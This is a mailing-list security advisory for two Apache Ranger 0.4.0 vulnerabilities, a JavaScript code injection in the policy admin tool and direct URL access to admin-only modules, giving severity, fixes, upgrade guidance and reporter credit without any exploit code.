Ranger Community: Please see below details.
CVE-2015-0265: Apache Ranger code injection vulnerability ---------------------------------------------------------------------------- --- Severity: Important Vendor: The Apache Software Foundation Versions Affected: 0.4.0 version of Apache Ranger Users affected: All admin users of ranger policy admin tool Description: Unauthorized users can send some javascript code to be executed in ranger policy admin tool admin sessions Fix detail: Added logic to sanitize the user input Mitigation: Users should upgrade to 0.5.0+ version of Apache Ranger with the fix Credit: Thanks to Jakub Kałużny from SecuRing for reporting this issue CVE-2015-0266: Apache Ranger direct url access vulnerability ---------------------------------------------------------------------------- ----- Severity: Important Vendor: The Apache Software Foundation Versions Affected: 0.4.0 version of Apache Ranger Users affected: All users of ranger policy admin tool Description: Regular users can type in the URL of modules that are accessible only to admin users Fix detail: Added logic in the backend to verify user access Mitigation: Users should upgrade to 0.5.0+ version of Apache Ranger with the fix Credit: Thanks to Jakub Kałużny from SecuRing for reporting this issue Thank you, Vel
